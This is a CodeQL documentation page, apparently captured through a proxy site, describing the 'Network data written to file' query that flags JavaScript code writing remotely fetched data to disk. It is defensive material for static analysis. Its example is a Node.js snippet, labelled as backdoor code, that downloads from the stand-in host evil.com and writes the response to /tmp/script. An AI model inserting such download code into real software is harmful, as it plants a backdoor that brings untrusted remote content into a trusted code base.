Network data written to file¶

ID: js/http-to-file-access
Kind: path-problem
Security severity: 6.3
Severity: warning
Precision: medium
Tags:
   - security
   - external/cwe/cwe-912
   - external/cwe/cwe-434
Query suites:
   - javascript-security-extended.qls
   - javascript-security-and-quality.qls

Click to see the query in the CodeQL repository

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation¶

Examine the highlighted code closely to ensure that it is behaving as intended.

Example¶

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

var https = require("https");
var fs = require("fs");

https.get('https://evil.com/script', res => {
  res.on("data", d => {
    fs.writeFileSync("/tmp/script", d)
  })
});

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References¶

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

© GitHub, Inc.
Terms
Privacy

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.

Network data written to file¶

Recommendation¶

Example¶

References¶

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.